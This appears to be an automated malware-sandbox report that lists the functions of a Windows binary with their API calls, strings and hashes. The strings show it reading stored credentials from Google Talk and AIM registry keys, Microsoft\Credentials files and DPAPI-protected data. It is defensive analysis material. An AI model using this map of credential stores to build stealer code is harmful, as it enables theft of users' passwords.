                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
                                                                                                      • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                      • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                      • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                      • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                      • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
                                                                                                      • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
                                                                                                      • Part of subcall function 00407C79: memcpy.MSVCRT ref: 00407DB2
                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                    • memset.MSVCRT ref: 00407FCC
                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                    • memset.MSVCRT ref: 00408019
                                                                                                    • RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
                                                                                                    Strings
                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 00407F99
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                    • API String ID: 2959138223-1079885057
                                                                                                    • Opcode ID: 29dbe836aef6fa5013a9611a43396d8c0875219e8056679997d98ea8c5a25880
                                                                                                    • Instruction ID: d1f993f4292481421df56ff24d775a8bf39926e587c7cc16b4fa812e835a0406
                                                                                                    • Opcode Fuzzy Hash: 29dbe836aef6fa5013a9611a43396d8c0875219e8056679997d98ea8c5a25880
                                                                                                    • Instruction Fuzzy Hash: CC2131B1D0511DBADF21AB95DD42EEEBB7CAF04744F0000B6FA08B1151E7355B94CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041223F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00412192: LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                                                                                      • Part of subcall function 00412192: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                                                                                    • memset.MSVCRT ref: 00412297
                                                                                                    • RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                    • _mbscpy.MSVCRT ref: 0041230C
                                                                                                      • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004122B2, 004122C2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 889583718-2036018995
                                                                                                    • Opcode ID: 92230320118305b7d937a1f0dac2dfc09aaee06fc800f8ac7fa9974061941b41
                                                                                                    • Instruction ID: 8ee396e5f1da91aaa9319efae8cdfa2544b6f7efa6ef91eb3d4b19fa56f42788
                                                                                                    • Opcode Fuzzy Hash: 92230320118305b7d937a1f0dac2dfc09aaee06fc800f8ac7fa9974061941b41
                                                                                                    • Instruction Fuzzy Hash: 7011DB71800215BBDB24A6985D4A9EE77BCDB05304F1000EBED51F2152D6B89EE4C69E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411560, Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004115A1
                                                                                                    • K32EnumProcesses.KERNEL32(?,00004000,004044A3,?,004044A3,?,00000000,00000000,00000000), ref: 004115B9
                                                                                                      • Part of subcall function 004112D9: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                                                                                      • Part of subcall function 004112D9: K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                                                                                      • Part of subcall function 004112D9: K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                                                                                      • Part of subcall function 004112D9: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                                                                                      • Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198
                                                                                                      • Part of subcall function 0041172B: memcpy.MSVCRT ref: 00411758
                                                                                                    • _mbscpy.MSVCRT ref: 0041165E
                                                                                                    • CloseHandle.KERNEL32(00000000,004044A3,?), ref: 00411697
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnumProcess_mbscpy$ChangeFileFindHandleModuleModulesNameNotificationOpenProcessesmemcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3551507631-0
                                                                                                    • Opcode ID: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                                                                                    • Instruction ID: 5e40a2ef1ff72a785ccc601064cd9551f1045985186162b7752f8c4c90acf24d
                                                                                                    • Opcode Fuzzy Hash: 9809a1a83cd82cc29b60a12147b0f8e2d32acd45d844ff989c572edc4e4952da
                                                                                                    • Instruction Fuzzy Hash: 72317271901129ABDB20EB65DC85BEE77BCEB44344F0440ABE709E2160D7759EC5CA68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411C8F, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00411CB8
                                                                                                      • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                      • Part of subcall function 00406F2D: memcpy.MSVCRT ref: 00406F78
                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                    • memset.MSVCRT ref: 00411CF4
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 3143880245-0
                                                                                                    • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                    • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                                                                                    • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                    • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404220, Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00404241
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00404257
                                                                                                      • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00404291
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040429A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1968906679-0
                                                                                                    • Opcode ID: a2088bb8b873d4b09a99b72ff45e45ed8d7905610cb4390c4bc1171379a6186b
                                                                                                    • Instruction ID: a1f592bc07a1c6bae19e5ae82b96cf667b255c71c14e9b40cb31a6e8a4c88875
                                                                                                    • Opcode Fuzzy Hash: a2088bb8b873d4b09a99b72ff45e45ed8d7905610cb4390c4bc1171379a6186b
                                                                                                    • Instruction Fuzzy Hash: F801A1B2501118BBD710AA65EC45EDF776CEB853B4F10823EFD15E62D0EB389E0086A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004112D9, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?,?,?), ref: 004112FF
                                                                                                    • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?,?,?,?), ref: 00411316
                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,?,?,00000104,?,?,?), ref: 0041132A
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 00411336
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Process$ChangeCloseEnumFileFindModuleModulesNameNotificationOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1149579341-0
                                                                                                    • Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                                                                                    • Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
                                                                                                    • Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                                                                                    • Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004140F2, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                                                                                    • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
                                                                                                    • Opcode Fuzzy Hash: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                                                                                    • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D935, Relevance: 4.5, APIs: 3, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D959
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                                                                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                                                                                      • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                                                                                      • Part of subcall function 0040D794: atoi.MSVCRT ref: 0040D840
                                                                                                      • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8B3
                                                                                                      • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8C6
                                                                                                      • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                                                                                    • String ID:
                                                                                                    • API String ID: 2578913611-0
                                                                                                    • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                    • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                                                                                    • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                                                                                    • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410383, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                                                                                    • _mbscpy.MSVCRT ref: 004103C3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Version_mbscpy
                                                                                                    • String ID: CryptUnprotectData
                                                                                                    • API String ID: 1856898028-1975210251
                                                                                                    • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                                                                                    • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
                                                                                                    • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                                                                                    • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C5A4, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi
                                                                                                    • String ID: /stext
                                                                                                    • API String ID: 1439213657-3817206916
                                                                                                    • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                    • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                                                                                    • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                                                                                    • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004042AA, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
                                                                                                      • Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F
                                                                                                      • Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                      • Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
                                                                                                      • Part of subcall function 00407898: strlen.MSVCRT ref: 00407904
                                                                                                    • _strnicmp.MSVCRT ref: 0040431A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$FileFindFirst_strnicmp
                                                                                                    • String ID: credentials
                                                                                                    • API String ID: 773473087-4194641934
                                                                                                    • Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                                                                                    • Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
                                                                                                    • Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                                                                                    • Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E675, Relevance: 3.0, APIs: 2, Instructions: 48stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E695
                                                                                                      • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                                                                                    • strrchr.MSVCRT ref: 0040E6B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: CompareFileTimememsetstrrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 4226234548-0
                                                                                                    • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                                                                                    • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
                                                                                                    • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                                                                                    • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404380, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004043A1
                                                                                                      • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                      • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                      • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
                                                                                                      • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
                                                                                                      • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$_mbscat$_strnicmpmemset
                                                                                                    • String ID: Microsoft\Credentials
                                                                                                    • API String ID: 137454763-3148402405
                                                                                                    • Opcode ID: 534b94f348ff77f92d95b5e4988a783b2db2841f264cbeec3dfc1c08343812ca
                                                                                                    • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
                                                                                                    • Opcode Fuzzy Hash: 534b94f348ff77f92d95b5e4988a783b2db2841f264cbeec3dfc1c08343812ca
                                                                                                    • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411EC1, Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
                                                                                                    • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString$Write
                                                                                                    • String ID:
                                                                                                    • API String ID: 2948465352-0
                                                                                                    • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                                                                                    • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
                                                                                                    • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                                                                                    • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406D2B, Relevance: 3.0, APIs: 2, Instructions: 21timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00406D4F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1631957507-0
                                                                                                    • Opcode ID: 7bff6bc8731922aebfa0769e74e5599f4fdc97828f53a7f2077a8613dbe9e9dd
                                                                                                    • Instruction ID: ee1f68b728ceb5a298c60dc052c4b3ed262b371f399a07f2899d8fe9e4a13fdd
                                                                                                    • Opcode Fuzzy Hash: 7bff6bc8731922aebfa0769e74e5599f4fdc97828f53a7f2077a8613dbe9e9dd
                                                                                                    • Instruction Fuzzy Hash: C7D0123660116067872137676C0CDDF6E6ADECA326706843AF15593110D634481686A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040733E, Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: 58ac891cade6ab6a9bef53ce8be61fa91b6cb828682ec7c513dabb990eb490b2
                                                                                                    • Instruction ID: 60201c5085d43ced1243c36dc80756929096d21483c981360304d2deafd8db66
                                                                                                    • Opcode Fuzzy Hash: 58ac891cade6ab6a9bef53ce8be61fa91b6cb828682ec7c513dabb990eb490b2
                                                                                                    • Instruction Fuzzy Hash: AFD042B0908B008FC7B0DF39E401542BBF0EB083257108D3ED0AAC2A50E735A1449F04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408490, Relevance: 2.6, APIs: 2, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404D18: LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                                                                                      • Part of subcall function 00404D18: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                                                                                      • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                                                                                      • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                                                                                      • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                                                                                      • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                                                                                      • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                                                                                    • wcslen.MSVCRT ref: 004084CF
                                                                                                    • memset.MSVCRT ref: 0040854D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadmemsetwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1960736289-0
                                                                                                    • Opcode ID: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                                                                                    • Instruction ID: 2dd004568a6c17cef409d44c463746fb2ce178d2970b6d5fdfdea9e5a7127ffe
                                                                                                    • Opcode Fuzzy Hash: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                                                                                    • Instruction Fuzzy Hash: D931A331500159BFCB11DFA4CD819EF77A8AF88304F14447EF985B7181DA38AE599B68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F9A0, Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                                                                                      • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                                                                                      • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                                                                                      • Part of subcall function 00406D2B: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 00406D4F
                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: strlen$FileTime$ChangeCloseCompareFindNotificationmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3386971655-0
                                                                                                    • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                    • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                                                                                    • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                                                                                    • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00411D37, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                                                                                      • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                                                                                      • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                                                                                      • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4165544737-0
                                                                                                    • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                    • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                                                                                    • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                                                                                    • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
